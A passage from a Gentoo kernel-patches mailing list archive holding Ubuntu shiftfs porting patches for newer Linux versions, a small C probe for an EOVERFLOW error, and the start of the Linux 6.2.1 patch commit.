+-			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 	return err;
+ }
+ 
+-static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
+ 			  umode_t mode,  bool excl)
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+-static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			 umode_t mode)
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+-static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
+ 			 dev_t rdev)
+ {
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+-static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(loweri, lowerd);
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
+ 	else
+-		err = vfs_unlink(loweri, lowerd, NULL);
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
+ 	revert_creds(oldcred);
+ 
+ 	if (!err) {
+@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	return shiftfs_rm(dir, dentry, true);
+ }
+ 
+-static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		      *trapd;
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
+ 	int err = -EINVAL;
+ 	const struct cred *oldcred;
+ 
+@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		goto out_unlock;
+ 
+ 	oldcred = shiftfs_override_creds(old->d_sb);
+-	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
+-			 NULL, flags);
++	err = vfs_rename(&rd);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(loweri_dir_old, olddir);
+@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+-static int shiftfs_permission(struct inode *inode, int mask)
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(inode, mask);
++	err = generic_permission(ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(loweri, mask);
++	err = inode_permission(ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
+ 	return err;
+ }
+ 
+-static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct dentry *dentry,
+ 			   umode_t mode)
+ {
+ 	int err;
+@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+-static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(dentry, attr);
++	err = setattr_prepare(ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, &newattr, NULL);
++	err = notify_change(ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	return err;
+ }
+ 
+-static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
+ 			break;
+ 		case ACL_GROUP:
+-			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
+ 			kgid = shift_kgid(from, to, kgid);
+-			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
+ 			break;
+ 		default:
+ 			break;
+@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 	}
+ }
+ 
+-static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ {
+ 	struct inode *loweri = inode->i_private;
+ 	const struct cred *oldcred;
+@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ 	int size;
+ 	int err;
+ 
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
+ 	if (!IS_POSIXACL(loweri))
+ 		return NULL;
+ 
+@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
+ 
+ static int
+ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
+ 			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(inode))
++	if (!inode_owner_or_capable(ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(dentry, handler->name);
++		err = shiftfs_removexattr(ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 13 Apr 2022 15:26:22 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
+Cc: mpagano@gentoo.org
+
+With the porting of shiftfs from 5.15 to 5.17, some filesystem-related
+functions now take a struct user_namespace argument; however, the
+shiftfs logic still relies on these functions using the main
+filesystem namespace.
+
+Make sure to always use init_user_ns to prevent breakage of system
+components that rely on shiftfs.
+
+Without this fix lxd was showing some issues, like failing to create
+any file inside a container when shiftfs was used (e.g., with zfs as
+the storage pool).
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
+ 1 file changed, 24 insertions(+), 26 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 76c54bc12018..a21624c529f0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct user_namespace *ns,
+-			    struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(ns, lowerd, name);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(ns, dentry, name);
+-	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct user_namespace *ns,
+-				 struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(ns, inode, diri, mode);
++		inode_init_owner(&init_user_ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+ static int shiftfs_mknod(struct user_namespace *ns,
+@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(ns, inode, mask);
++	err = generic_permission(&init_user_ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(ns, loweri, mask);
++	err = inode_permission(&init_user_ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(ns, dentry, attr);
++	err = setattr_prepare(&init_user_ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(ns, lowerd, &newattr, NULL);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(ns, dentry, handler->name);
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 27 Apr 2022 18:20:41 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21624c529f0..a5338dc6290c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -21,6 +21,7 @@
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
+ #include <linux/fiemap.h>
++#include <linux/pagemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Tue, 18 Oct 2022 17:09:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a5338dc6290c..34f080ae0fec 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
+ }
+ 
+ static int shiftfs_tmpfile(struct user_namespace *ns,
+-			   struct inode *dir, struct dentry *dentry,
++			   struct inode *dir, struct file *file,
+ 			   umode_t mode)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+-	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
+ 
+ 	if (!loweri->i_op->tmpfile)
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+-- 
+2.39.2
+
+From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 4 Jan 2023 10:25:30 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 34f080ae0fec..cda74b614505 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ 		return NULL;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	lower_acl = get_acl(loweri, type);
++	lower_acl = get_inode_acl(loweri, type);
+ 	revert_creds(oldcred);
+ 
+ 	if (lower_acl && !IS_ERR(lower_acl)) {
+@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = {
+ 	.permission	= shiftfs_permission,
+ 	.getattr	= shiftfs_getattr,
+ 	.listxattr	= shiftfs_listxattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ };
+ 
+ static const struct inode_operations shiftfs_file_inode_operations = {
+ 	.fiemap		= shiftfs_fiemap,
+ 	.getattr	= shiftfs_getattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ 	.listxattr	= shiftfs_listxattr,
+ 	.permission	= shiftfs_permission,
+ 	.setattr	= shiftfs_setattr,
+@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = {
+ 
+ static const struct inode_operations shiftfs_special_inode_operations = {
+ 	.getattr	= shiftfs_getattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ 	.listxattr	= shiftfs_listxattr,
+ 	.permission	= shiftfs_permission,
+ 	.setattr	= shiftfs_setattr,
+-- 
+2.39.2
+
+From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
+From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Date: Tue, 31 Jan 2023 17:11:48 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1990849
+
+We haven't supported idmapped layers with shiftfs and, moreover, that
+makes no sense: once the lower fs supports idmapped mounts, shiftfs is
+not needed.
+
+Starting from linux-image-5.15.0-48-generic, users started seeing
+EOVERFLOW errors from the userspace side on trivial fs operations
+inside containers.
+
+This is caused by patches ("fs: tweak fsuidgid_has_mapping()"),
+("fs: support mapped mounts of mapped filesystems"). These patches extends
+and enables idmapped mounts support in Ubuntu kernel, but the problem is
+that shiftfs was not properly ported.
+
+See also:
+("namei: prepare for idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
+("overlayfs: do not mount on top of idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
+as a reference.
+
+This patch should be applied on top of kinetic/master-next and is based
+on the changes by Andrea Righi in 4c934edc66 ("UBUNTU: SAUCE: shiftfs:
+always rely on init_user_ns").
+
+This commit, together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always
+rely on init_user_ns"), has to be ported to the jammy tree too.
+
+Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
+Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
+Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Acked-by: Tim Gardner <tim.gardner@canonical.com>
+Acked-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 16 +++++++++++++---
+ 1 file changed, 13 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index cda74b614505..2664e1fb65d3 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	struct renamedata rd = {
+-		.old_mnt_userns	= ns,
++		.old_mnt_userns	= &init_user_ns,
+ 		.old_dir	= loweri_dir_old,
+ 		.old_dentry	= lowerd_old,
+-		.new_mnt_userns	= ns,
++		.new_mnt_userns	= &init_user_ns,
+ 		.new_dir	= loweri_dir_new,
+ 		.new_dentry	= lowerd_new,
+ 	};
+@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(ns, inode))
++	if (!inode_owner_or_capable(&init_user_ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
+-- 
+2.39.2
+


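As a rough illustration of the failure mode described in the commit message
above (not part of the patch itself; which operation trips the error first
depends on the container workload), a hypothetical user-space probe for the
-EOVERFLOW condition could look like this:

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	/* try a trivial create inside the suspect mount */
	const char *dir = argc > 1 ? argv[1] : "probe-dir";

	if (mkdir(dir, 0755) == -1) {
		if (errno == EOVERFLOW) /* "Value too large for defined data type" */
			fprintf(stderr, "mkdir %s: EOVERFLOW (id mapping not representable)\n", dir);
		else
			fprintf(stderr, "mkdir %s: %s\n", dir, strerror(errno));
		return 1;
	}
	printf("mkdir %s: ok\n", dir);
	rmdir(dir);
	return 0;
}
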
^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-25 11:02 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-02-25 11:02 UTC (permalink / raw)
  To: gentoo-commits

commit:     733f0b27e0c7f9379d6bcc7a7f3104646e48f743
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 10:58:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=733f0b27

Linux patch 6.2.1

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1000_linux-6.2.1.patch | 552 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 556 insertions(+)

diff --git a/0000_README b/0000_README
index 8bb95e22..46624397 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.2.1.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.2.1.patch b/1000_linux-6.2.1.patch
new file mode 100644
index 00000000..5ca655c1
--- /dev/null
+++ b/1000_linux-6.2.1.patch
@@ -0,0 +1,552 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 135d93368d36e..f77188f30210f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3515,7 +3515,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index 3f6628780eb21..f26824f367a99 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
